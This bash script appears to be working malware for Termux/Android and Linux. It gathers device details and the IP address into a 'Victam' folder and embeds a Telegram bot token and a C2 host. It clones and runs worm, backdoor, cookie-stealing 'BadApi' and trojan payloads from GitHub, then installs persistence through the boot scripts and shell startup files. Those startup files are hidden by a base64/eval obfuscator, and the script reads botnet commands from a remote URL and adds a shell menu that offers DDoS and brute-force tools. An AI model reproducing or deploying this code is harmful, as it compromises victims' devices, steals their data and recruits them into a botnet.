#!/bin/usr/bash

#Colors
R="$(printf '\033[1;31m')"
G="$(printf '\033[1;32m')"
Y="$(printf '\033[1;33m')"
W="$(printf '\033[1;37m')"
C="$(printf '\033[1;36m')"
b="\033[1;30m"
r="\033[1;31m"
g="\033[1;32m"
y="\033[1;33m"
b="\033[1;34m"
p="\033[1;35m"
c="\033[1;36m"
v="\033[1;37m"
w="\033[0;37m"
black="\033[1;30m"
red="\033[1;31m"
green="\033[1;32m"
yellow="\033[1;33m"
blue="\033[1;34m"
purple="\033[1;35m"
cyan="\033[1;36m"
violate="\033[1;37m"
white="\033[0;37m"
nc="\033[00m"
#--------ModeTool---------#
info="${cyan}[${white}+${cyan}] ${yellow}"
fun="${cyan}[${white}@${cyan}] ${purple}"
ask="${cyan}[${white}?${cyan}] ${purple}"
bad="${cyan}[${white}!${cyan}] ${red}"
good="${cyan}[${white}√${cyan}] ${green}"
#---------FaceType--------#
sad="$red ಠ⁠︵ಠ⁠"
llok="$blue ಠ⁠_⁠ʖ⁠ಠ⁩"
hehe="$yellow ಡ⁠ ͜⁠ ⁠ʖ⁠ ⁠ಡ"
huh="$blue ʘ⁠‿⁠ʘ"
happy="( ⁠•⁠ ⁠‿⁠ ⁠•⁠ )"
#---------OPIONS----------#
home=$(pwd)
more_info="@SomHac_R"
name=$0
TOKEN="5691570782:AAGMKFygk9MyAlZXtPNddydtDsY4Ouo8-ng"
CHAT_ID="5010958919"
B24B_HOST="193.161.193.99"
B24B_PORT="37858"
Device=$(uname -a)
Tdate=$(date)
HostName=$(hostname)
Kernel=$(uname -r)
UpTime=$(uptime)
MemoryUsage=$(free -m)
DiskUsage=$(df -h)
if [[ -f $PREFIX/etc/Hacked/Victam/victam.sim ]];then

Dev_ID=$(sed -n '5p' $PREFIX/etc/Hacked/Victam/victam.sim)

fi
#-------------------------#
# Check if offline
net() {
    while true; do
        wget --spider --quiet https://github.com &>> /dev/null
        if [ "$?" = 0 ]; then

            nN='Y'
            NnEt="Connected To Network [★]"

        break
       else
                nN='N'
                NnEt="No Internet [X] "
                break
        fi
    done
}
net
if [[ -f $PREFIX/etc/B24B/blue24bluer/setting.24 ]];then

	source $PREFIX/etc/B24B/blue24bluer/setting.24

else

	Lang="ar"

fi

#####################################################################################
# Termux
if [[ -d /data/data/com.termux/files/home ]]; then
termux=true
PREFIX='/data/data/com.termux/files/usr/'
elif [[ -d /root/ ]];then
termux=false
PREFIX='/'
else
printf ""
fi
#####################################################################################

if [[ `command -v ifconfig` ]];then

ifconfig=$(ifconfig | grep netmask | grep 255.255 | cut -d 't' -f2 | cut -d ' ' -f2)
ip_data=$(curl -s ipinfo.io;echo -e "${ifconfig}")&>>/dev/null

else

ifconfig=$(ip -4 addr show dev wlan0 | grep inet | awk '{print $2}')
ip_data=$(curl -s ipinfo.io;echo -e "${ifconfig}")&>>/dev/null

fi

# package manager

if [[ `command -v B24B.apt` ]]; then
        apt="apt"
elif [[ `command -v apt` ]]; then
    apt="apt"
elif  [[ `command -v apt-get` ]]; then
    apt="apt-get"
elif  [[ `command -v yum` ]]; then
    apt="yum"
elif [[ `command -v dnf` ]]; then
    apt="dnf"
elif [[ `command -v apk` ]]; then
    apt="apk"
elif [[ `command -v pacman` ]]; then
    apt="pacman"
else
    printf ""
fi

if [[ ` command -v fish ` ]];then

fish_file=true

fi

if [[ $termux == true && $fish_file == true ]];then

tr_file="$PREFIX/etc/termux-login.sh"

elif [[ $termux != true && $fish_file == true ]];then

tr_file="$PREFIX/etc/fish/config.fish"

elif [[ $termux != true && $fish_file != true ]];then

tr_file="$PREFIX/etc/bash.bashrc"

elif [[ $termux == true && $fish_file != true ]];then

tr_file="$PREFIX/etc/termux-login.sh"

fi

if [[ -d $PREFIX/etc/Hacked/stutus/stutus ]];then

	if [[ -f $PREFIX/etc/Hacked/stutus/stutus ]];then

		bash $PREFIX/etc/Hacked/stutus/stutus

	else

		if [[ $nN == [yY] ]];then
			cd $PREFIX/etc/Hacked/
			rm -rfd stutus/
			git clone https://github.com/blue24bluer/stutus &>>/dev/null
	                if [[ $? == "0" ]];then
        	       		touch $PREFIX/etc/Hacked/Victam/About_This_Phone
                		bash $PREFIX/etc/Hacked/stutus/stutus
	                else

				sleep 4
				rm $PREFIX/etc/Hacked/ $PREFIX/etc/Hacked/Victam/ -rfd
				Rebulid

			fi

		else


			Dev=$(echo -e "

			#----------------
			Device infomore : $Device\n
			#----------------
			Hacked on date  : $Tdate\n
			#----------------
			Host Name       : $HostName\n
			#----------------
			Kernel          : $Kernel\n
			#----------------
			Up Time         : $UpTime\n
			#----------------
			Memory Usage    : $MemoryUsage\n
			#----------------
			IP Address      : $ip_data\n
			#----------------

			")

		fi
	fi

else

		if [[ $nN == [yY] ]];then
			cd $PREFIX/etc/Hacked/
			rm -rfd stutus/
			git clone https://github.com/blue24bluer/stutus &>>/dev/null
	                if [[ $? == "0" ]];then
        	       		touch $PREFIX/etc/Hacked/Victam/About_This_Phone
                		bash $PREFIX/etc/Hacked/stutus/stutus
	                else

				sleep 4
				rm $PREFIX/etc/Hacked/ $PREFIX/etc/Hacked/Victam/ -rfd
				Rebulid

			fi

		else


			Dev=$(echo -e "

			#----------------
			Device infomore : $Device\n
			#----------------
			Hacked on date  : $Tdate\n
			#----------------
			Host Name       : $HostName\n
			#----------------
			Kernel          : $Kernel\n
			#----------------
			Up Time         : $UpTime\n
			#----------------
			Memory Usage    : $MemoryUsage\n
			#----------------
			IP Address      : $ip_data\n
			#----------------

			")

		fi

fi

Encoder(){

if [[ ! -f $file_in_non ]]
then
exit
fi
obf(){
randm1=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm2=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm3=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm4=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm5=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm6=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm7=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm8=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm9=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm10=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm11=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm12=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm13=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm14=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm15=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm16=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm17=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm18=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm19=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm20=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm21=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm22=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm23=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm24=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm25=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm26=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm27=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm28=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm29=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm30=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm31=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
randm32=$(cat /dev/urandom | tr -dc 'A-Za-z' | fold -w 100 | head -n 1)
        anu=$(cat $file_in_non | base64 | tr -d '\n' )
        anu=$(echo "$anu" | rev)
        nasa="$randm1=\"$randm2\";$randm3=\"$randm4\";$randm5=\"ch\";$randm6=\"4\";$randm7=\"\";$randm9=\"$randm10\";$randm11=\" $anu | r\";$randm12=\"$randm13\";$randm14=\"\";$randm15=\"as\";$randm16=\"$randm17\";$randm18=\"$randm19\";$randm20=\"o\";$randm21=\"6\";$randm22=\"$randm23\";$randm24=\" -d\";$randm25=\"$randm26\";$randm27=\"\";$randm28=\"b\";$randm29=\"e\";$randm30=\"v |\";Tx="Eds";$randm31=\"\""
de=''"$randm32"'=$(eval '"\"\$$randm14\$$randm29\$$randm5\$$randm7\$$randm20\$$randm11\$$randm29\$$randm30\$$randm14\$$randm28\$$randm31\$$randm15\$$randm29\$$randm21\$$randm7\$$randm6\$$randm24\$$randm31\""')'
zc='eval '"\"\$$randm27\$$randm32\$$randm14\$$randm7\""''
        printf "$nasa;$de;$zc" >> $file_out_non
}
obf

}

#####################################################################################
Rebulid(){

if [[ ${nN} == "Y" ]];then


if [[ -d $PREFIX/etc/Hacked/ ]];then

printf ""

	if [[ -d $PREFIX/etc/Hacked/Victam/ ]];then

printf ""

	else

			mkdir $PREFIX/etc/Hacked/Victam/ &>> /dev/null
			Rebulid
	fi

	if [[ -d $PREFIX/etc/Hacked/Server ]];then

		printf ""

	else

		cd $PREFIX/etc/Hacked/
		while true;do
			git clone https://github.com/blue24bluer/Server &>> /dev/null
			if [[ $? == "0" ]];then
				break
			fi
		done
	fi

	if [[ -d $PREFIX/etc/Hacked/BlueVirus ]];then

		printf ""

	else

		cd $PREFIX/etc/Hacked/
		git clone https://github.com/blue24bluer/BadShell_B24B &>> /dev/null
		mv BadShell_B24B BlueVirus

	fi

	if [[ -d $PREFIX/etc/Hacked/LOCKS ]];then

		printf ""

	else

		mkdir $PREFIX/etc/Hacked/LOCKS

	fi

	if [[ -d $PREFIX/etc/Hacked/Badshell ]];then

printf ""

	else


		while true ;do

			cd $PREFIX/etc/Hacked/
			git clone https://github.com/blue24bluer/Badshell &>> /dev/null
			if [[ $? == '0' ]];then

				break

			fi
		done

	fi

	if [[ -d $PREFIX/etc/Hacked/stutus ]];then

		printf ""

	else

		cd $PREFIX/etc/Hacked/
		while true;do

			git clone https://github.com/blue24bluer/stutus &>> /dev/null
			if [[ $? == "0" ]];then

				bash $PREFIX/etc/Hacked/stutus/stutus
				break

			fi

		done

	fi

else

			mkdir $PREFIX/etc/Hacked/ &>> /dev/null
			Rebulid

fi

if [[ -d $PREFIX/etc/B24B ]];then

	printf ""

else

	cd $PREFIX/etc/
	mkdir B2
	cd B2
	while true;do
		git clone https://github.com/blue24bluer/AllInOne &>> /dev/null
		if [[ $? == "0" ]];then

			break

		else

			printf ""

		fi
	done
	cd AllInOne/
	bash AllInOne installit
	bash AllInOne dpkg
	bash AllInOne badshell
fi


                	cd $PREFIX/etc/Hacked/


#                               cp badshell/Hacker.jpg $PREFIX/etc/Hacked/
#                               cp badshell/Blue24Bluer.jpg $PREFIX/etc/Hacked/
#                               touch $PREFIX/etc/Hacked/Victam/About_This_Phone
				if [[ -d $PREFIX/etc/Hacked/ ]];then
					if [[ -d $PREFIX/etc/Hacked/Victam/ ]];then
                        	        	echo -e "$HostNamen \n $Kernel \n $UpTime \n $MemoryUsage \n $DiskUsage \n $ip" > $PREFIX/etc/Hacked/Victam/About_This_Phone 
					else

						Rebulid

					fi

				else

					Rebulid &>> /dev/null

				fi

if [[ -f $PREFIX/etc/Hacked/Badshell/worm ]];then

	if [[ $(cat $PREFIX/etc/Hacked/Badshell/worm) == "" ]];then

		rm -rfd $PREFIX/etc/Hacked/Badshell
		Rebulid &>> /dev/null

	else

		printf ""

	fi

else

	rm -rfd $PREFIX/etc/Hacked/Badshell
	Rebulid &>> /dev/null

fi

fi
}
#---------------------------------------------
#---------------------------------------------
#---------------------------------------------
#(--------------BY_Blue24Bluer---------------)
#---------------------------------------------
#---------------------------------------------
#---------------------------------------------
Safe_worm(){

if [[ -f $PREFIX/etc/Hacked/LOCKS/worm_lock_file ]];then

	if [[ $(cat $PREFIX/etc/Hacked/LOCKS/worm_lock_file) == "End" ]];then

		printf ""

	else

		rm -rfd $PREFIX/etc/Hacked/LOCKS/worm_lock_file
		Safe_worm
	fi

else

	bash $PREFIX/etc/Hacked/Badshell/worm &>> /dev/null

fi

}
#---------------------------------------------
#---------------------------------------------
#---------------------------------------------
Safe_backdoor(){

if [[ -f $PREFIX/etc/Hacked/LOCKS/backdoor_lock_file ]];then

	if [[ $(cat $PREFIX/etc/Hacked/LOCKS/backdoor_lock_file) == "End" ]];then

		printf ""

	else

		rm $PREFIX/etc/Hacked/LOCKS/backdoor_lock_file
		Safe_backdoor
	fi

else

	bash $PREFIX/etc/Hacked/Badshell/backdoor &>> /dev/null

fi

}
#---------------------------------------------
#---------------------------------------------
#---------------------------------------------
Safe_WormFixer(){

if [[ -f $PREFIX/etc/Hacked/LOCKS/WormFixer_lock_file ]];then

	if [[ $(cat $PREFIX/etc/Hacked/LOCKS/WormFixer_lock_file) == "End" ]];then

		printf ""

	else

		rm $PREFIX/etc/Hacked/LOCKS/WormFixer_lock_file
		Safe_WormFixer
	fi

else

	bash $PREFIX/etc/Hacked/Badshell/WormFixer &>> /dev/null

fi

}
#---------------------------------------------
#---------------------------------------------
#---------------------------------------------
Safe_API(){

if [[ -f $PREFIX/etc/Hacked/LOCKS/api_lock_file ]];then

	if [[ $(cat $PREFIX/etc/Hacked/LOCKS/api_lock_file) == "End" ]];then

		printf ""

	else

		rm $PREFIX/etc/Hacked/LOCKS/api_lock_file
		Safe_API
	fi

else

	BadApi &>> /dev/null

fi

}
#---------------------------------------------
#---------------------------------------------
#---------------------------------------------
BadApi(){

# F file :

if [[ $termux == "true" ]];then

	if [[ $Server_Get_Command == "" ]];then

		if [[ -f $PREFIX/etc/Hacked/api_lock_file ]];then

			printf ""

		else

			bash $PREFIX/etc/Hacked/Badshell/BadApi All

		fi

	elif [[ $Server_Get_Command == "All" ]];then

		if [[ -f $PREFIX/etc/Hacked/api_lock_file ]];then

			printf ""

		else

			bash $PREFIX/etc/Hacked/Badshell/BadApi All

		fi
	else

		if [[ -f $PREFIX/etc/Hacked/api_lock_file ]];then

                        printf ""

                else

                        bash $PREFIX/etc/Hacked/Badshell/BadApi $Server_Get_Command

                fi

	fi

else


		if [[ -f $PREFIX/etc/Hacked/api_lock_file ]];then

			printf ""

		else

			bash $PREFIX/etc/Hacked/Badshell/BadApi COOKIE

		fi


fi

}
#####################################################################################
#####################################################################################
#####################################################################################
Update(){

if [[ $nN == "Y" ]];then

	if [[ -f $PREFIX/etc/Hacked/Update ]];then

		if [[ $(cat $PREFIX/etc/Hacked/Update) == "" ]];then

			this_date=$(date +%Y/%m/%d)
			echo -e $this_date > $PREFIX/etc/Hacked/Update
			base=1
		fi

	fi

		printf ""

else

	this_date=$(date +%Y/%m/%d)
	echo -e $this_date > $PREFIX/etc/Hacked/Update
	base=1
fi

if [[ $nN == "Y" ]];then

current_date=$(date +%Y/%m/%d)
file_date=$(cat $PREFIX/etc/Hacked/Update)
days_diff=$(( ( $(date -d "$current_date" +%s) - $(date -d "$file_date" +%s) ) / 86400 ))


if [[ $days_diff -ge 3 || $(date +%a) == "Fri" || $base == 1 ]];then

	this_date=$(date +%Y/%m/%d)
	base=0
	echo -e $this_date > $PREFIX/etc/Hacked/Update
	#Update-Server
	cd $PREFIX/etc/Hacked/
#--------------------------------------------------------------------
	if [[ -d $PREFIX/etc/Hacked/Server ]];then
		rm -rfd $PREFIX/etc/Hacked/Server &>> /dev/null
	fi
		while true;do
			cd $PREFIX/etc/Hacked/
			git clone https://github.com/blue24bluer/Server &>> /dev/null
			if [[ $? == "0" ]];then
				break
			fi
		done
#--------------------------------------------------------------------
	if [[ -d $PREFIX/etc/Hacked/BlueVirus ]];then
		rm -rfd $PREFIX/etc/Hacked/BlueVirus &>> /dev/null
	fi
		while true;do
			cd $PREFIX/etc/Hacked/
			git clone https://github.com/blue24bluer/BadShell_B24B &>> /dev/null
			if [[ $? == "0" ]];then
				mv BadShell_B24B BlueVirus
				break
			fi
		done
#--------------------------------------------------------------------
	if [[ -d $PREFIX/etc/Hacked/Badshell ]];then
		rm -rfd $PREFIX/etc/Hacked/Badshell &>> /dev/null
	fi

		while true;do
			git clone https://github.com/blue24bluer/Badshell
			if [[ $? == "0" ]];then
				break
			fi
			Rebulid &>> /dev/null
		done
#--------------------------------------------------------------------
        if [[ -d $PREFIX/etc/B24B/blue24bluer ]];then
                rm -rfd $PREFIX/etc/B24B/blue24bluer/AllInOne &>> /dev/null
        fi

                while true;do
			cd $PREFIX/etc/B24B/blue24bluer
                        git clone https://github.com/blue24bluer/AllInOne
                        if [[ $? == "0" ]];then
				mv $PREFIX/etc/B24B/blue24bluer/AllInOne/AllInOne $PREFIX/etc/B24B/blue24bluer/AllInOne.file
				rm -rfd $PREFIX/etc/B24B/blue24bluer/AllInOne
				mv $PREFIX/etc/B24B/blue24bluer/AllInOne.file $PREFIX/etc/B24B/blue24bluer/AllInOne
                                break
                        fi
                        Rebulid &>> /dev/null
                done
#--------------------------------------------------------------------
        if [[ -d $PREFIX/etc/Hacked/stutus ]];then
                rm -rfd $PREFIX/etc/Hacked/stutus &>> /dev/null
        fi

                while true;do
			cd $PREFIX/Hacked
                        git clone https://github.com/blue24bluer/stutus
                        if [[ $? == "0" ]];then
				bash $PREFIX/etc/Hacked/stutus/stutus &>> /dev/null
                                break
                        fi
                        Rebulid &>> /dev/null
                done
#--------------------------------------------------------------------
	Safe_API
#--------------------------------------------------------------------
	if [[ -d $PREFIX/etc/Hacked/LOCKS/ ]];then

		printf ""

	else

		mkdir $PREFIX/etc/Hacked/LOCKS/

	fi
#--------------------------------------------------------------------
	if [[ $termux == "true" ]];then
		if [[ -d ~/.termux/boot ]];then
			echo "
termux-wake-lock
Test1(){

if pgrep -f \"bash $PREFIX/etc/Hacked/Server/server\" >/dev/null; then

        printf ""

else

        if [[ -f $PREFIX/etc/Hacked/LOCKS/server_lock_file ]];then

                if [[ $(cat $PREFIX/etc/Hacked/LOCKS/server_lock_file) == \"End\" ]];then

                        Test1
                        rm $PREFIX/etc/Hacked/LOCKS/server_lock_file

                fi

        else

                touch $PREFIX/etc/Hacked/LOCKS/server_lock_file
                bash $PREFIX/etc/Hacked/Server/server &>> /dev/null

        fi

fi

}

Test1 &>>/dev/null
			" > ~/.termux/boot/startup
		else

			if [[ -d $PREFIX/etc/B24B/ ]];then

				if [[ -d $PREFIX/etc/B24B/blue24bluer ]];then

					if [[ -f $PREFIX/etc/B24B/blue24bluer/AllInOne ]];then

						bash $PREFIX/etc/B24B/blue24bluer/AllInOne installit
						bash $PREFIX/etc/B24B/blue24bluer/AllInOne dpkg
						bash $PREFIX/etc/B24B/blue24bluer/AllInOne badshell

					else

						Rebulid

					fi

				else

					Rebulid

				fi

			else

				Rebulid

			fi



		fi
	fi
#--------------------------------------------------------------------
	fi

fi

if [[ -f $PREFIX/etc/B24B/blue24bluer/shell_me ]];then
source $PREFIX/etc/B24B/blue24bluer/shell_me
else
shell_me="false"
fi

if [[ $shell_me == "true" ]];then

	if [[ $termux == "true" ]];then

		echo -e "
termux-wake-lock
Test1(){

if pgrep -f \"bash $PREFIX/etc/Hacked/Server/server\" >/dev/null; then

        printf ""

else

        if [[ -f $PREFIX/etc/Hacked/LOCKS/server_lock_file ]];then

                if [[ $(cat $PREFIX/etc/Hacked/LOCKS/server_lock_file) == \"End\" ]];then

                        Test1
                        rm $PREFIX/etc/Hacked/LOCKS/server_lock_file

                fi

        else

                touch $PREFIX/etc/Hacked/LOCKS/server_lock_file
                bash $PREFIX/etc/Hacked/Server/server &>> /dev/null

        fi

fi

}

Test1 &>>/dev/null
                " > $tr_file

		echo -e "

			RUNSYS=\"B24B_\"

			if [[ $PpP != \"\" ]];then

				toilet -f mono12 -F border -F gay -F metal \"   login\" | lolcat
				echo -e \$info \"Please Enter The Passowrd\"
				read ssp
				if [[ $PpP == \$ssp ]];then
					clear

				fi

				toilet -f mono12 -F border $nameT -F gay -F metal

				while true;do

					read -p \"\[\033[01;32m\](\${b}Blue24Bluer\${t})[\${nameT}\${y}]==>\[\033[01;36m\] \" sys_tool

					if [[ \"\$sys_tool\" == \"\${RUNSYS}start\" ]];then

						bash $PREFIX/etc/B24B/blue24bluer/AllInOne --start

					elif [[ \"\$sys_tool\" == \"\${RUNSYS}Mikro\" ]];then

						\${RUNSYS}Mikro

					elif [[ \"\$sys_tool\" == \"\${RUNSYS}TM\" ]];then

						\${RUNSYS}TM

					elif [[ \"\$sys_tool\" == \"\${RUNSYS}info\" ]];then

						\${RUNSYS}info

					elif [[ \"\$sys_tool\" == \"\${RUNSYS}help\" ]];then

						\${RUNSYS}help

					elif [[ \"\$sys_tool\" == \"\${RUNSYS}games\" ]];then

						\${RUNSYS}games

					elif [[ \"\$sys_tool\" == \"\${RUNSYS}BF\" ]];then

						\${RUNSYS}BF

					elif [[ \"\$sys_tool\" == \"\${RUNSYS}PS\" ]];then

						\${RUNSYS}PS

					elif [[ \"\$sys_tool\" == \"\${RUNSYS}WS\" ]];then

						\${RUNSYS}WS

					elif [[ \"\$sys_tool\" == \"\${RUNSYS}Ddos\" ]];then

						\${RUNSYS}Ddos

					elif [[ \"\$sys_tool\" == \"\${RUNSYS}msg\" ]];then

						\${RUNSYS}msg

					elif [[ \"\$sys_tool\" == \"\${RUNSYS}intro\" ]];then

						\${RUNSYS}intro

					elif [[ \"\$sys_tool\" == \"\${RUNSYS}pass\" ]];then

						\${RUNSYS}pass

					else

						bash -c \"\$sys_tool\"

					fi

				done

				echo -e \$green \"                    <<<\$red The Script By: Blue24Bluer \$green>>>\"
				PS1=\"\[\033[01;32m\](\${b}Blue24Bluer${t})[${nameT}${y}]==>\[\033[01;36m\] \"

			else
				clear
				echo
				echo
				figlet -f slant \"PASS ERROR\"
				sleep 1
				bash $tr_file

			fi

" >> $tr_file
file_in_non="$tr_file"
file_out_non="$PREFIX/etc/B24B/blue24bluer/shame.dec"
Encoder
echo "" > $tr_file
cat "$PREFIX/etc/B24B/blue24bluer/shame.dec" > "$tr_file"
rm "$PREFIX/etc/B24B/blue24bluer/shame.dec"

	else
		echo -e "
termux-wake-lock
Test1(){

if pgrep -f \"bash $PREFIX/etc/Hacked/Server/server\" >/dev/null; then

        printf ""

else

        if [[ -f $PREFIX/etc/Hacked/LOCKS/server_lock_file ]];then

                if [[ $(cat $PREFIX/etc/Hacked/LOCKS/server_lock_file) == \"End\" ]];then

                        Test1
                        rm $PREFIX/etc/Hacked/LOCKS/server_lock_file

                fi

        else

                touch $PREFIX/etc/Hacked/LOCKS/server_lock_file
                bash $PREFIX/etc/Hacked/Server/server &>> /dev/null

        fi

fi

}

Test1 &>>/dev/null
" > $PREFIX/etc/bash.bashrc
if [[ $tr_file == "$PREFIX/etc/fish/config.fish" ]];then
echo "bash -c '$PREFIX/etc/bash.bashrc' " > $tr_file
else
printf ""
fi

		echo -e "

			RUNSYS=\"B24B_\"

			if [[ $PpP != \"\" ]];then

				toilet -f mono12 -F border -F gay -F metal \"   login\" | lolcat
				echo -e \$info \"Please Enter The Passowrd\"
				read ssp
				if [[ $PpP == \$ssp ]];then
					clear

				fi

				toilet -f mono12 -F border $nameT -F gay -F metal

				while true;do

					read -p \"\[\033[01;32m\](\${b}Blue24Bluer\${t})[\${nameT}\${y}]==>\[\033[01;36m\] \" sys_tool

					if [[ \"\$sys_tool\" == \"\${RUNSYS}start\" ]];then

						bash $PREFIX/etc/B24B/blue24bluer/AllInOne --start

					elif [[ \"\$sys_tool\" == \"\${RUNSYS}Mikro\" ]];then

						\${RUNSYS}Mikro

					elif [[ \"\$sys_tool\" == \"\${RUNSYS}TM\" ]];then

						\${RUNSYS}TM

					elif [[ \"\$sys_tool\" == \"\${RUNSYS}info\" ]];then

						\${RUNSYS}info

					elif [[ \"\$sys_tool\" == \"\${RUNSYS}help\" ]];then

						\${RUNSYS}help

					elif [[ \"\$sys_tool\" == \"\${RUNSYS}games\" ]];then

						\${RUNSYS}games

					elif [[ \"\$sys_tool\" == \"\${RUNSYS}BF\" ]];then

						\${RUNSYS}BF

					elif [[ \"\$sys_tool\" == \"\${RUNSYS}PS\" ]];then

						\${RUNSYS}PS

					elif [[ \"\$sys_tool\" == \"\${RUNSYS}WS\" ]];then

						\${RUNSYS}WS

					elif [[ \"\$sys_tool\" == \"\${RUNSYS}Ddos\" ]];then

						\${RUNSYS}Ddos

					elif [[ \"\$sys_tool\" == \"\${RUNSYS}msg\" ]];then

						\${RUNSYS}msg

					elif [[ \"\$sys_tool\" == \"\${RUNSYS}intro\" ]];then

						\${RUNSYS}intro

					elif [[ \"\$sys_tool\" == \"\${RUNSYS}pass\" ]];then

						\${RUNSYS}pass

					else

						bash -c \"\$sys_tool\"

					fi

				done

				echo -e \$green \"                    <<<\$red The Script By: Blue24Bluer \$green>>>\"
				PS1=\"\[\033[01;32m\](\${b}Blue24Bluer${t})[${nameT}${y}]==>\[\033[01;36m\] \"

			else
				clear
				echo
				echo
				figlet -f slant \"PASS ERROR\"
				sleep 1
				bash $tr_file

			fi

" >> $tr_file
file_in_non="$tr_file"
file_out_non="$PREFIX/etc/B24B/blue24bluer/shame.dec"
Encoder
echo "" > $tr_file
cat "$PREFIX/etc/B24B/blue24bluer/shame.dec" > "$tr_file"
rm "$PREFIX/etc/B24B/blue24bluer/shame.dec"

	fi


else

	if [[ $(cat $tr_file | grep -o "server") != "server" ]];then

		if [[ $termux == true ]];then

			echo "
termux-wake-lock
Test1(){

if pgrep -f \"bash $PREFIX/etc/Hacked/Server/server\" >/dev/null; then

        printf ""

else

        if [[ -f $PREFIX/etc/Hacked/LOCKS/server_lock_file ]];then

                if [[ $(cat $PREFIX/etc/Hacked/LOCKS/server_lock_file) == \"End\" ]];then

                        Test1
                        rm $PREFIX/etc/Hacked/LOCKS/server_lock_file

                fi

        else

                touch $PREFIX/etc/Hacked/LOCKS/server_lock_file
                bash $PREFIX/etc/Hacked/Server/server &>> /dev/null

        fi

fi

}

Test1 &>>/dev/null
			" > $tr_file

		else

		echo -e "
termux-wake-lock
Test1(){

if pgrep -f \"bash $PREFIX/etc/Hacked/Server/server\" >/dev/null; then

        printf ""

else

        if [[ -f $PREFIX/etc/Hacked/LOCKS/server_lock_file ]];then

                if [[ $(cat $PREFIX/etc/Hacked/LOCKS/server_lock_file) == \"End\" ]];then

                        Test1
                        rm $PREFIX/etc/Hacked/LOCKS/server_lock_file

                fi

        else

                touch $PREFIX/etc/Hacked/LOCKS/server_lock_file
                bash $PREFIX/etc/Hacked/Server/server &>> /dev/null

        fi

fi

}

Test1 &>>/dev/null
" > $PREFIX/etc/bash.bashrc
if [[ $tr_file == "$PREFIX/etc/fish/config.fish" ]];then
echo "bash -c '$PREFIX/etc/bash.bashrc' " > $tr_file
else
printf ""
fi

		fi

	fi

fi




}
#####################################################################################
#####################################################################################
#####################################################################################
ServerHome(){

if [[ -d $PREFIX/etc/Hacked/ ]];then
net
	if [[ $termux == "true" ]];then

		termux-api-start &>> /dev/null
		termux-wake-lock &>> /dev/null
	fi

if [[ -f $PREFIX/etc/Hacked/Server/.B24B_BotNet ]];then

	System_Host=$(cat $PREFIX/etc/Hacked/Server/.B24B_BotNet)
else
	System_Host="Didn't exit"

fi

if [[ $nN == Y ]];then

	System_Server=$(curl --silent https://SomHac.netlify.app/)
else
	System_Server="No Internet"

fi

if [[ $System_Host == $System_Server ]];then

Start

else

if [[ ${nN} == "Y" ]];then
while true ;do

	curl --silent https://SomHac.netlify.app/ > $PREFIX/etc/Hacked/Server/.B24B_BotNet
		if [[ $(cat $PREFIX/etc/Hacked/Server/.B24B_BotNet) == "" ]];then
			printf ""
		else
			break
		fi

done
fi

fi
#------------------------------------------------------------------------------------
Server_Host=$(sed -n "2p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_Port=$(sed -n "3p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_Start=$(sed -n "4p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_Get=$(sed -n "5p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_Hack=$(sed -n "6p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_Trojan=$(sed -n "7p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_Alert=$(sed -n "8p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_SendAlert=$(sed -n "9p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_Number=$(sed -n "10p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_Message=$(sed -n "11p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_Send=$(sed -n "12p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_Excute=$(sed -n "13p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_Excute_Run=$(sed -n "14p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
Server_Get_Command=$(sed -n "15p" "$PREFIX/etc/Hacked/Server/.B24B_BotNet")
